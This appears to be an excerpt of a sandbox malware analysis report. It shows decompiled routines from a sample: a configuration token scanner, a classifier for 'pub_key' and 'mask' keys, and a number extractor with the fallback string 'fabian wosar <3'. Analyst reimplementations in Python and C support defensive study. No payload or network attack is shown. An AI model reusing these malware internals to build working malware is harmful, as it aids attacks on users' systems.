                                        													_t35 =  &(_t35[1]);
                                        													if(_t18 == 0x3d) {
                                        														goto L15;
                                        													} else {
                                        														_t18 =  *_t35;
                                        														if(_t18 != 0) {
                                        															continue;
                                        														} else {
                                        															goto L15;
                                        														}
                                        													}
                                        													goto L25;
                                        												}
                                        											}
                                        										}
                                        									}
                                        								}
                                        							}
                                        							L25:
                                        							_t7 =  &(_t26[1]); // 0x850f00e8
                                        							_t10 =  *_t7;
                                        							_t26 =  &(_t26[1]);
                                        						} while (_t10 != 0);
                                        						return 1;
                                        					}
                                        				} else {
                                        					 *__ecx = 1;
                                        					L4:
                                        					return 1;
                                        				}
                                        			}
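Analyst reimplementation of the '{...}' scanner in E0F9D33E0, added here as an example; it is not code from the sample or from Joe Sandbox. It exists so the extraction rules visible in the decompiled output can be exercised on constructed input. E0F9D3190 (the tag classifier) and E0F9D3200 (the handler for class-1 tags) are not shown on this page, so the classifier is passed in as a callable and the tag names used by demo_classify are hypothetical. Two behaviours of the decompiled code are mirrored and worth noting: only the most recent class-2 value survives, because each one overwrites ctx+8 and the previous HeapAlloc block is never freed, and when no closing '}' follows a value the unconditional `*_t40 = 0x7d;` after the copy writes a brace over the string's terminating NUL.

```python
# Analyst reimplementation (added example, not the sample's own code) of the
# '{...}' token scanner decompiled as E0F9D33E0. E0F9D3190 (tag classifier)
# and E0F9D3200 (class-1 handler) are not on the page; `classify` is injected.
OPEN, CLOSE, EQUALS = "{", "}", "="


def _value_after_equals(text, i):
    """Mirror the class-2 path (the 0x3d/0x7d while loop, then L15/L21).

    From position i (just past '{'): walk until '=' (the value follows it)
    or end of string (empty value); a '}' seen before any '=' means no value.
    A value that starts on '}' (e.g. "{v=}") is also not copied, because the
    L15 test `*_t35 != 0x7d` fails. Returns the text up to the next '}' or
    end of string, or None when the sample would copy nothing.
    """
    n = len(text)
    j = i
    while j < n:                       # j >= n plays the role of the NUL
        c = text[j]
        if c == CLOSE:                 # '}' before '=': loop exits, no copy
            return None
        j += 1
        if c == EQUALS:                # L15 is entered just past '='
            break
    if j < n and text[j] == CLOSE:     # L15: value starting on '}' skipped
        return None
    k = text.find(CLOSE, j)            # L21 copies up to '}' or the NUL
    return text[j:n if k == -1 else k]


def scan_brace_tokens(text, classify):
    """Return {'class1': [offsets], 'class2': [values], 'last_value': str|None}.

    classify(rest) receives the text right after '{' and returns 0, 1 or 2,
    matching how the caller uses E0F9D3190's result. Class 1 is handled by
    E0F9D3200 in the sample (not shown), so only its offset is recorded.
    The sample keeps just the latest class-2 value at ctx+8, overwriting
    (and leaking) the previous heap block; 'last_value' mirrors that.
    """
    out = {"class1": [], "class2": [], "last_value": None}
    i, n = 0, len(text)
    while i < n:
        if text[i] == OPEN:
            i += 1                     # _t26 = &_t26[1]: step past the '{'
            kind = classify(text[i:])
            if kind == 1:
                out["class1"].append(i)
            elif kind == 2:
                value = _value_after_equals(text, i)
                if value is not None:
                    out["class2"].append(value)
                    out["last_value"] = value
        i += 1                         # L25: advance one char and continue
    return out


def demo_classify(rest):
    """Hypothetical tag scheme for the demo; the real E0F9D3190 is not shown."""
    if rest.startswith("v="):
        return 2
    if rest.startswith("f"):
        return 1
    return 0


if __name__ == "__main__":
    sample = "{f}x{v=abc}y{v=}z{v=last"   # constructed input, not from the sample
    print(scan_brace_tokens(sample, demo_classify))
```

The constructed input covers the four paths the decompiled code distinguishes: a class-1 tag, a normal `{v=...}` value, a value that starts on '}' (not copied), and a value with no closing brace (copied up to the end of the string, which is where the sample would clobber the terminator).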


                                        0x0f9d33e3
                                        0x0f9d33e5
                                        0x0f9d33e9
                                        0x0f9d33eb
                                        0x0f9d33ee
                                        0x0f9d33f1
                                        0x0f9d33f8
                                        0x0f9d34db
                                        0x0f9d34db
                                        0x0f9d3410
                                        0x0f9d3425
                                        0x0f9d342b
                                        0x0f9d342f
                                        0x00000000
                                        0x0f9d3431
                                        0x0f9d3432
                                        0x0f9d3434
                                        0x0f9d343a
                                        0x0f9d3441
                                        0x0f9d3444
                                        0x0f9d344a
                                        0x0f9d344b
                                        0x0f9d34ba
                                        0x0f9d344d
                                        0x0f9d344e
                                        0x0f9d3450
                                        0x0f9d3452
                                        0x0f9d3456
                                        0x0f9d3467
                                        0x0f9d3467
                                        0x0f9d346b
                                        0x0f9d346d
                                        0x0f9d3471
                                        0x0f9d3473
                                        0x0f9d3478
                                        0x0f9d347c
                                        0x00000000
                                        0x00000000
                                        0x0f9d347e
                                        0x00000000
                                        0x0f9d347c
                                        0x0f9d3480
                                        0x0f9d3480
                                        0x0f9d3483
                                        0x0f9d3484
                                        0x0f9d3495
                                        0x0f9d349e
                                        0x0f9d34a3
                                        0x0f9d34a7
                                        0x0f9d34a7
                                        0x0f9d34ad
                                        0x0f9d34b0
                                        0x0f9d34b0
                                        0x00000000
                                        0x0f9d3458
                                        0x0f9d345c
                                        0x0f9d345f
                                        0x00000000
                                        0x0f9d3461
                                        0x0f9d3461
                                        0x0f9d3465
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d3465
                                        0x00000000
                                        0x0f9d345f
                                        0x0f9d3458
                                        0x0f9d3456
                                        0x0f9d344e
                                        0x0f9d344b
                                        0x0f9d3444
                                        0x0f9d34bf
                                        0x0f9d34bf
                                        0x0f9d34bf
                                        0x0f9d34c2
                                        0x0f9d34c3
                                        0x0f9d34d6
                                        0x0f9d34d6
                                        0x0f9d3412
                                        0x0f9d3412
                                        0x0f9d3418
                                        0x0f9d3422
                                        0x0f9d3422

                                        APIs
                                          • Part of subcall function 0F9D32B0: lstrlenA.KERNEL32(?,00000000,?,0F9D52F0,?,?,0F9D33F6,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D32C5
                                          • Part of subcall function 0F9D32B0: lstrlenA.KERNEL32(?,?,0F9D33F6,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D32EE
                                        • lstrlenA.KERNEL32(0F9D52F1,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D3484
                                        • GetProcessHeap.KERNEL32(00000008,00000001,?,0F9D52F0,00000000), ref: 0F9D348E
                                        • HeapAlloc.KERNEL32(00000000,?,0F9D52F0,00000000), ref: 0F9D3495
                                        • lstrcpyA.KERNEL32(00000000,0F9D52F1,?,0F9D52F0,00000000), ref: 0F9D34A7
                                        • ExitProcess.KERNEL32 ref: 0F9D34DB
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$HeapProcess$AllocExitlstrcpy
                                        • String ID:
                                        • API String ID: 1867342102-0
                                        • Opcode ID: f40ee0010914772b7a7c920ddefe84d5ddf38b72419f311ca54df484ae5f3618
                                        • Instruction ID: 2eadb3a7e336fa3221ecfededf03f1dda319bd8864a1b048a5c50baba3533d3b
                                        • Opcode Fuzzy Hash: f40ee0010914772b7a7c920ddefe84d5ddf38b72419f311ca54df484ae5f3618
                                        • Instruction Fuzzy Hash: F33105315082455AEB320F689844FF57B6C9F82352FB8C189F885CB2C3D62D688687A3
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _memset.LIBCMT ref: 0F9D3B72
                                        • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F9D3B96
                                        • VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F9D3B9A
                                        • VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F9D3B9E
                                        • VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F9D3BC5
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ConditionMask$InfoVerifyVersion_memset
                                        • String ID:
                                        • API String ID: 3299124433-0
                                        • Opcode ID: 71180fe03a982e302bf0205fc68ac21d9800b20cc7769f97f1eadcb03e161e13
                                        • Instruction ID: b908308a20444b2cbfb41d379da8936264d4ba24b459d59ea5ff71969377bbf9
                                        • Opcode Fuzzy Hash: 71180fe03a982e302bf0205fc68ac21d9800b20cc7769f97f1eadcb03e161e13
                                        • Instruction Fuzzy Hash: C9111BB0D4031C6EEB609F64DC0ABEA7ABCEB09704F008199A648E61C1D6B94B948FD5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 97%
                                        			E0F9D4CD0(intOrPtr* __ecx, CHAR* __edx, intOrPtr* _a4) {
                                        				CHAR* _v8;
                                        				char _v12;
                                        				char _v20;
                                        				char _t16;
                                        				char _t20;
                                        				char _t21;
                                        				intOrPtr* _t24;
                                        				intOrPtr _t25;
                                        				intOrPtr _t26;
                                        				intOrPtr* _t29;
                                        				CHAR* _t33;
                                        				intOrPtr _t34;
                                        				intOrPtr _t35;
                                        				void* _t38;
                                        				void* _t41;
                                        				intOrPtr* _t42;
                                        				void* _t47;
                                        				void* _t49;
                                        				intOrPtr* _t51;
                                        				CHAR* _t53;
                                        
                                        				asm("movq xmm0, [0xf9dfa84]");
                                        				_t16 =  *0xf9dfa8c; // 0x0
                                        				_t29 = _a4;
                                        				_v8 = __edx;
                                        				_t51 = __ecx;
                                        				asm("movq [ebp-0x10], xmm0");
                                        				_v12 = _t16;
                                        				if( *_t29 == 0) {
                                        					L11:
                                        					if(_t51 == 0) {
                                        						goto L10;
                                        					} else {
                                        						if(_v20 == 0) {
                                        							L22:
                                        							if(_t51 == 0) {
                                        								goto L10;
                                        							} else {
                                        								_t53 = _t51 + lstrlenA( &_v20);
                                        								while(1) {
                                        									_t20 =  *_t53;
                                        									if(_t20 >= 0x30 && _t20 <= 0x39) {
                                        										break;
                                        									}
                                        									_t53 =  &(_t53[1]);
                                        								}
                                        								_t33 = _t53;
                                        								while(1) {
                                        									_t21 =  *_t33;
                                        									if(_t21 < 0x30 || _t21 > 0x39) {
                                        										goto L30;
                                        									}
                                        									L31:
                                        									_t33 =  &(_t33[1]);
                                        									continue;
                                        									L30:
                                        									if(_t21 == 0x2e) {
                                        										goto L31;
                                        									}
                                        									 *_t33 = 0;
                                        									return lstrcpyA(_v8, _t53);
                                        									goto L33;
                                        								}
                                        							}
                                        						} else {
                                        							_t34 =  *_t51;
                                        							if(_t34 != 0) {
                                        								_t47 = _t51 -  &_v20;
                                        								do {
                                        									_t24 =  &_v20;
                                        									if(_t34 == 0) {
                                        										L19:
                                        										if( *_t24 == 0) {
                                        											goto L22;
                                        										} else {
                                        											goto L20;
                                        										}
                                        									} else {
                                        										while(1) {
                                        											_t35 =  *_t24;
                                        											if(_t35 == 0) {
                                        												goto L22;
                                        											}
                                        											_t41 =  *((char*)(_t47 + _t24)) - _t35;
                                        											if(_t41 != 0) {
                                        												goto L19;
                                        											} else {
                                        												_t24 = _t24 + 1;
                                        												if( *((intOrPtr*)(_t47 + _t24)) != _t41) {
                                        													continue;
                                        												} else {
                                        													goto L19;
                                        												}
                                        											}
                                        											goto L33;
                                        										}
                                        										goto L22;
                                        									}
                                        									goto L33;
                                        									L20:
                                        									_t34 =  *((intOrPtr*)(_t51 + 1));
                                        									_t51 = _t51 + 1;
                                        									_t47 = _t47 + 1;
                                        								} while (_t34 != 0);
                                        							}
                                        							goto L10;
                                        						}
                                        					}
                                        				} else {
                                        					_t25 =  *__ecx;
                                        					if(_t25 == 0) {
                                        						L10:
                                        						return lstrcpyA(_v8, "fabian wosar <3");
                                        					} else {
                                        						_t49 = __ecx - _t29;
                                        						do {
                                        							_t42 = _t29;
                                        							if(_t25 == 0) {
                                        								L8:
                                        								if( *_t42 == 0) {
                                        									goto L11;
                                        								} else {
                                        									goto L9;
                                        								}
                                        							} else {
                                        								while(1) {
                                        									_t26 =  *_t42;
                                        									if(_t26 == 0) {
                                        										goto L11;
                                        									}
                                        									_t38 =  *((char*)(_t49 + _t42)) - _t26;
                                        									if(_t38 != 0) {
                                        										goto L8;
                                        									} else {
                                        										_t42 = _t42 + 1;
                                        										if( *((intOrPtr*)(_t49 + _t42)) != _t38) {
                                        											continue;
                                        										} else {
                                        											goto L8;
                                        										}
                                        									}
                                        									goto L33;
                                        								}
                                        								goto L11;
                                        							}
                                        							goto L33;
                                        							L9:
                                        							_t25 =  *((intOrPtr*)(_t51 + 1));
                                        							_t51 = _t51 + 1;
                                        							_t49 = _t49 + 1;
                                        						} while (_t25 != 0);
                                        						goto L10;
                                        					}
                                        				}
                                        				L33:
                                        			}
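Analyst reimplementation of the string-extraction routine in E0F9D4CD0, added here as an example; it is not code from the sample or from Joe Sandbox. The decompiled control flow is: locate _a4 (the needle) in the buffer passed in __ecx, then locate the 12-byte global loaded into _v20 from that position, skip to the first byte in 0x30..0x39, and copy the following run of digits and 0x2e ('.') to the output; if either search fails, or the buffer is empty, the literal "fabian wosar <3" is copied instead. The value of the _v20 global is not shown on this page, so it is a parameter here, and the "IP" needle and "Address:" marker in the usage are hypothetical stand-ins. One caveat carried over from the decompiled code: the skip-to-first-digit loop has no NUL check, so a buffer with no digit after the marker would be read past its end; this reimplementation stops at the end of the string and returns the fallback there, which is a choice of mine rather than the sample's behaviour.

```python
# Analyst reimplementation (added example, not the sample's own code) of the
# string-extraction routine decompiled as E0F9D4CD0.
FALLBACK = "fabian wosar <3"          # literal copied by the L10 path


def extract_numeric_token(buf, needle, marker):
    """Return the first run of [0-9.] after `marker` in `buf`, or FALLBACK.

    Mirrors the decompiled control flow:
      1. find `needle` (_a4) in `buf` (__ecx); empty buf or no hit -> FALLBACK
      2. from that position, find `marker` (the 12-byte global the code loads
         into _v20; its value is not on the page, hence a parameter here)
      3. skip to the first byte in 0x30..0x39, then take every byte that is a
         digit or '.' (0x2e) and hand that run back to the caller
    As decompiled, the skip loop in step 3 has no NUL check; this version
    stops at the end of the string and returns FALLBACK (my choice).
    """
    if not buf:
        return FALLBACK
    pos = 0
    if needle:
        pos = buf.find(needle)
        if pos == -1:
            return FALLBACK
    if marker:
        pos = buf.find(marker, pos)     # second search starts at the needle hit
        if pos == -1:
            return FALLBACK
    i = pos + len(marker)               # _t53 = _t51 + lstrlenA(&_v20)
    while i < len(buf) and not ("0" <= buf[i] <= "9"):
        i += 1
    if i == len(buf):
        return FALLBACK
    j = i
    while j < len(buf) and ("0" <= buf[j] <= "9" or buf[j] == "."):
        j += 1
    return buf[i:j]                     # the sample NUL-terminates here and lstrcpyA's


if __name__ == "__main__":
    # Constructed response body; "IP" and "Address:" are hypothetical stand-ins
    # for the sample's needle and for the unshown _v20 marker.
    body = "<html><body>Current IP Address: 203.0.113.7</body></html>"
    print(extract_numeric_token(body, "IP", "Address:"))
```

Because the digit run accepts any mix of digits and dots, the routine copies whatever dotted number follows the marker, and the fallback string is itself a usable detection artefact for this code path.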

                                        Instruction addresses for the listing above run from 0x0f9d4cd6 to 0x0f9d4dd4; the per-line address column of the report layout is not reproduced here.

                                        APIs
                                        • lstrcpyA.KERNEL32(?,fabian wosar <3,?,0F9D5034), ref: 0F9D4D3D
                                        • lstrlenA.KERNEL32(00000000,?,0F9D5034), ref: 0F9D4D97
                                        • lstrcpyA.KERNEL32(?,?,?,0F9D5034), ref: 0F9D4DC8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen
                                        • String ID: fabian wosar <3
                                        • API String ID: 367037083-1724090804
                                        • Opcode ID: 412a329dc0b7dbad1ccf363e3dd7b9b465e37444ced1a8d346a901f423907529
                                        • Instruction ID: 673b918679bf427c4e54f02d159f0e369767471d9fc70112bb3fadab08324379
                                        • Opcode Fuzzy Hash: 412a329dc0b7dbad1ccf363e3dd7b9b465e37444ced1a8d346a901f423907529
                                        • Instruction Fuzzy Hash: 6C3105258082A94BDB32CE7C54643FABFA9AF47201FB8D589E8C55B287D231744EC790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0F9D3190(CHAR* _a4) {
                                        				/* Classifies the key of one "key=value}" configuration token:
                                        				   returns 2 for "pub_key", 1 for "mask", 0 otherwise. The
                                        				   decompiler dropped the operands of its "==" ternaries; they are
                                        				   the results of the two lstrcmpiA calls listed under APIs below
                                        				   and are filled in here on that basis. */
                                        				char _t6;
                                        				CHAR* _t13;
                                        				CHAR* _t16;
                                        				int _t10;
                                        				int _t11;
                                        
                                        				_t13 = _a4;
                                        				_t16 = _t13;
                                        				if( *_t13 == 0) {
                                        					L5:
                                        					/* Case-insensitive match of the key against the two known names. */
                                        					_t10 = lstrcmpiA(_t13, "mask") == 0 ? 1 : 0;
                                        					_t11 = lstrcmpiA(_a4, "pub_key") == 0 ? 2 : _t10;
                                        					/* Put back the '=' that the loop replaced with NUL. As decompiled,
                                        					   this write also runs on the empty-token and no-'=' paths, where
                                        					   _t16 points at the string terminator. */
                                        					 *_t16 = 0x3d;
                                        					return _t11;
                                        				} else {
                                        					/* Walk forward to the '=' separator or the closing '}'. */
                                        					while(1) {
                                        						_t6 =  *_t16;
                                        						if(_t6 == 0x7d) {
                                        							break;
                                        						}
                                        						if(_t6 == 0x3d) {
                                        							 *_t16 = 0;
                                        							goto L5;
                                        						}
                                        						_t16 =  &(_t16[1]);
                                        						if( *_t16 == 0) {
                                        							goto L5;
                                        						}
                                        					}
                                        					return 0;
                                        				}
                                        			}
                                        Instruction addresses for E0F9D3190 run from 0x0f9d3193 to 0x0f9d31f5; the per-line address column of the report layout is not reproduced here.

                                        APIs
                                        • lstrcmpiA.KERNEL32(0F9D52F0,mask,0F9D52F1,?,?,0F9D3441,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D31B9
                                        • lstrcmpiA.KERNEL32(0F9D52F0,pub_key,?,0F9D3441,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D31D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcmpi
                                        • String ID: mask$pub_key
                                        • API String ID: 1586166983-1355590148
                                        • Opcode ID: dc83947407bc56870ee006937442ba29ab4ce0eb6c6c6e77889f462621b3af5e
                                        • Instruction ID: e71e890305bd38e5069b66116b8f61ade97e9b1cfc5e01979753ba9f99c97e9f
                                        • Opcode Fuzzy Hash: dc83947407bc56870ee006937442ba29ab4ce0eb6c6c6e77889f462621b3af5e
                                        • Instruction Fuzzy Hash: 33F046723082861EF7354E68DC45BA1BBCC9B42312FB4847EF78AC21C2C2AA9881C351
                                        Uniqueness

                                        Uniqueness Score: -1.00%
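The E0F9D3190 listing above is Windows-specific decompiler output and does not compile as shown. The following is an added example, not code from the Joe Sandbox report or from the sample: a portable C re-implementation of that key classifier, so the decompiled logic can be run on constructed tokens to confirm the return codes (2 for "pub_key", 1 for "mask", 0 otherwise) and the in-place '=' handling, including the path where the token contains no '='. It assumes POSIX strcasecmp in place of lstrcmpiA; the names classify_key, classify_copy and classify_scratch and the test tokens are the example's own, not identifiers from the sample.

```c
/* Added example: not code from the Joe Sandbox report or from the sample.
 * Portable re-implementation of the key classifier E0F9D3190 so the
 * decompiled logic can be run on constructed input. Assumptions: POSIX
 * strcasecmp stands in for the sample's lstrcmpiA, and the token buffer is
 * writable, because the routine edits it in place exactly as the sample does. */
#include <stdio.h>
#include <string.h>
#include <strings.h>

enum { KEY_UNKNOWN = 0, KEY_MASK = 1, KEY_PUB_KEY = 2 };

/* Classify the key of one "key=value}" token, mirroring E0F9D3190:
 * scan to '=' (or give up at '}'), NUL-terminate the key for the compare,
 * then write the '=' back. Returns 2 for "pub_key", 1 for "mask", else 0. */
int classify_key(char *tok)
{
    char *p = tok;
    int result;

    if (*tok != 0) {
        for (;;) {
            char c = *p;
            if (c == '}')             /* closing brace before any '=': not a key */
                return KEY_UNKNOWN;
            if (c == '=') {           /* terminate the key here */
                *p = 0;
                break;
            }
            p++;
            if (*p == 0)              /* ran off the end without finding '=' */
                break;
        }
    }

    /* Same precedence as the decompilation: pub_key wins over mask. */
    result = strcasecmp(tok, "mask") == 0 ? KEY_MASK : KEY_UNKNOWN;
    if (strcasecmp(tok, "pub_key") == 0)
        result = KEY_PUB_KEY;

    /* The sample writes '=' back unconditionally. With no '=' in the token
     * (or an empty token) p points at the terminator, so this write removes
     * it and the string runs on into whatever follows in memory. */
    *p = '=';
    return result;
}

/* Scratch copy for read-only input (the constructed test tokens below). The
 * buffer is zero-padded so the terminator-clobber case above stays bounded. */
static char scratch[64];

int classify_copy(const char *s)
{
    memset(scratch, 0, sizeof scratch);
    strncpy(scratch, s, sizeof scratch - 2);
    return classify_key(scratch);
}

const char *classify_scratch(void) { return scratch; }

int main(void)
{
    /* Constructed sample tokens, not values recovered from the sample. */
    const char *tokens[] = { "pub_key=abc}", "MASK=ff", "other=1}", "}", "mask", "" };
    size_t i;
    for (i = 0; i < sizeof tokens / sizeof tokens[0]; i++) {
        int r = classify_copy(tokens[i]);
        printf("\"%s\" -> %d, buffer now \"%s\"\n", tokens[i], r, classify_scratch());
    }
    return 0;
}
```

Build with `cc -o classify classify.c` and run it; each token prints its code and the buffer after the call, which makes the restore of '=' visible on the normal path and the dropped terminator visible on the "mask" and empty-token paths. A harness like this is the usual first step before writing a config extractor for the sample, since it pins down what the routine does on malformed tokens before any real configuration blob is fed to it.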